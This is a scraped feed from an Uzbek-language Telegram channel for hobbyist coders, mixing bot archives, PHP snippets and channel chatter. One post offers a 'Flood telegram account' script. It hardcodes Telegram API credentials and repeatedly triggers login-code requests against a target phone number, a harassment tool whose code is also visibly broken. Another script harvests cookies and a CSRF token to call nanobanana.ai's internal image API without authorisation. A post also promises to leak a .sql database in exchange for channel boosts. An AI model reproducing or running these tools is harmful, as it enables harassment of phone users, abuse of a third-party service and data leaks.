WonderfulCoders | ⎙
888 subscribers
68 photos
11 videos
62 files
119 links
☁️ fhost.uz - hosting xizmatlari uchun ideal tanlov

WWIW>all
Download Telegram
Qaysi ilova bilan karta ochtirsa boladi tekin (vertual emas)
This media is not supported in the widget
VIEW IN TELEGRAM
2🤣1
@mantiqosqon username sotlad 📞
Please open Telegram to view this post
VIEW IN TELEGRAM
Flood telegram account
from telethon.sync import TelegramClient
from telethon.errors import PhoneCodeInvalidError
from time import sleep
import os, sys
import pathlib
import linecache

phone_numbers = input("phone_number: ")
#
api_id = 10953300
api_hash = '9c24426e5d6fa1d441913e3906627f87'
#
session = "uzzz"
client = TelegramClient(session, api_id, api_hash)
client.connect()
#
for number in phone_numbers:
try:
client.send_code_request(number)
print(f"Code request sent to {number}")

try:
client.sign_in(phone_numbers, '123456')
except PhoneCodeInvalidError:
sleep(1)
print("succesed ✓")

os.remove("uzzz.session")
os.system("python 1s.py")

Defold versia !
👍4
Qanaqa funksiya yoki kod kerak?
videobot.rar
4.4 MB
Video yuklovchi pythonda
Manba : ruslar tuzgan ekan
Tarqatildi @WonderfulCoders
Reaksiya goooo kazino tasheman daxuya bolsa
👍4🔥1
GameBot Tg.zip
12.3 MB
Manba ruslar
Tarqatildi
@WonderfulCoders
Reaksiya kop bolsa yana tasheman
6🔥4👍3
Forwarded from WonderfulCoders | ⎙ (ㅤㅤㅤㅤ)
DekSEEN.zip
3.8 MB
Manba @k1_xa @fuck_youcx
Tarqatdik @WonderFulCodersChat

https://t.me/boost/fuck_youcx 30ta boost bo'ganda .sql tashlayman goo😀
4
.sql keremasmi deyman axaxax
@S_PIDERBot nomer bot qivoselarr bolad . Api ham beradi kimdurni beznesi kot bosn deb tashlamadim.🗿🤣 @simifyuz
Muxammad - Portfolio.html
11.3 KB
ikromov.wwiw.uz rasmini ozingla qoyasla my.png qilib
Qanaqa kod kere a
$keyboard = json_encode(array(
'resize_keyboard'=> true,
'input_field_placeholder='test uchun',
'keyboard=> []
));
Forwarded from 𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃 (Ozodbek Zayniddinov)
https://ozodbekdev.uz/api/subdomen?domen=ozodbekdev.uz


domen kiritish orqali subdomenlar roʻyhatini olasiz. Bepul API

@puaroXbot uchun ishlab chiqildi

@ozodbekdevv
1
@shipion_abot kodini tarqataman agar kanalda 2k bolsak nak hisoblanmaydi
🔥2
date_default_timezone_set("Asia/Tashkent");

// 4 xonali yil
$yil = date("Y"); // 2025

// 2 xonali yil
$yil2 = date("y"); // 25

// Oy
$oy_raqam = date("m"); // 01–12 (raqam bilan)
$oy_nomi = date("F"); // January, February ... (inglizcha)
$oy_nomi_3 = date("M"); // Jan, Feb ... (qisqartma)
kino-bot.zip
1 MB
Manba yo‘q
Tarqatildi
@WonderfulCoders
Pythonda kino bot
Demo yo‘q kerak bo‘lsa run qib korilar
Forwarded from WWIW Repository
import json
from fastapi import FastAPI, Query
from fastapi.responses import JSONResponse
from playwright.async_api import async_playwright

app = FastAPI()

NANO_URL = "https://nanobanana.ai/generator"
CREATE_URL = "https://nanobanana.ai/api/generate-image"
STATUS_URL = "https://nanobanana.ai/api/generate-image/status?taskId="

#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository

async def fetch_with_playwright(prompt: str):
async with async_playwright() as pw:
browser = await pw.chromium.launch(headless=True)
ctx = await browser.new_context()

page = await ctx.new_page()
await page.goto(NANO_URL, wait_until="networkidle")

await page.wait_for_timeout(1500)

#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository

cookies = await ctx.cookies()
cookie_header = "; ".join([f"{c['name']}={c['value']}" for c in cookies])

csrf_token = None
for c in cookies:
if c["name"] == "__Host-next-auth.csrf-token":
csrf_token = c["value"]
break

if csrf_token is None:
await browser.close()
return {"error": "CSRF token topilmadi", "cookies": cookie_header}

payload = {
"prompt": prompt,
"styleId": "realistic",
"mode": "text",
"imageUrl": None,
"imageSize": "auto",
"quality": "standard",
"numImages": 1,
"outputFormat": "png",
"model": "nano-banana",
"resolution": "1024*1024",
"aspectRatio": "1:1"
}

js = f"""
async () => {{
const res = await fetch("{CREATE_URL}", {{
method: "POST",
headers: {{
"Content-Type": "application/json",
"Cookie": "{cookie_header}"
}},
body: JSON.stringify({json.dumps(payload)})
}});
return res.json();
}}
"""

create_res = await page.evaluate(js)

if "taskId" not in create_res:
await browser.close()
return {
"error": "Failed to create task",
"response": create_res,
"cookies": cookie_header
}

task_id = create_res["taskId"]

while True:
status_js = f"""
async () => {{
const res = await fetch("{STATUS_URL}{task_id}", {{
method: "GET",
headers: {{
"Cookie": "{cookie_header}"
}}
}});
return res.json();
}}
"""

status = await page.evaluate(status_js)

if status.get("status") == "completed":
await browser.close()
return {
"taskId": task_id,
"imageUrl": status.get("imageUrl"),
"status": "completed"
}

if status.get("status") == "failed":
await browser.close()
return {"error": "Generation failed", "status": status}

#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository
#Manba @thewwiw & @wwiw_repository

@app.get("/generate")
async def generate(prompt: str = Query(...)):
try:
result = await fetch_with_playwright(prompt)
return JSONResponse(result)
except Exception as e:
return JSONResponse({"error": str(e)})


🍌 Nano Banana API Python versiya + FastAPI

‼️ Manbasiz ko'rmay!!

©️ @thewwiw & @wwiw_repository
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3👍2🔥1👏1